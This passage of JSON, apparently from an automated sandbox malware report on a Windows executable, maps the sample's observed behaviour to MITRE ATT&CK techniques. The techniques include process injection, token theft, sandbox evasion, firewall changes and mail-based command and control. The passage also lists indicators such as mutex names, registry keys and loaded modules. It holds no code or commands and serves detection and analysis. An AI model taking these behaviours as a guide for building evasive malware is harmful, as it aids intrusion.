"attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 5, "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ulhofeim.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74D50000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74910000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00002972)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"KERNEL32.DLL\" at base 77250000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"WS2_32.DLL\" at base 75f50000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"DBGHELP.DLL\" at base 6f220000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"USER32.DLL\" at base 75f90000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"ADVAPI32.DLL\" at base 771a0000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"SHELL32.DLL\" at base 761b0000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"OLEAUT32.DLL\" at base 75e40000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"MSVCR100.DLL\" at base 69f10000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"NTDLL.DLL\" at base 77330000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"OLE32.DLL\" at base 76e00000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"CRYPTBASE.DLL\" at base 75130000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 740a0000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"PROPSYS.DLL\" at base 73e50000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"COMCTL32.DLL\" at base 74100000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"APPHELP.DLL\" at base 750e0000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"CLBCATQ.DLL\" at base 75670000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a350000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77250000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"SETUPAPI.DLL\" at base 75850000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"RPCRT4.DLL\" at base 75570000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73e50000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"NTMARTA.DLL\" at base 746a0000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 774a0000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"PROFAPI.DLL\" at base 75250000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 754f0000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75ca0000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"SECUR32.DLL\" at base 74f60000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75310000\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750e0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70570000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 77250000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 75df0000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77480000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70570000\n 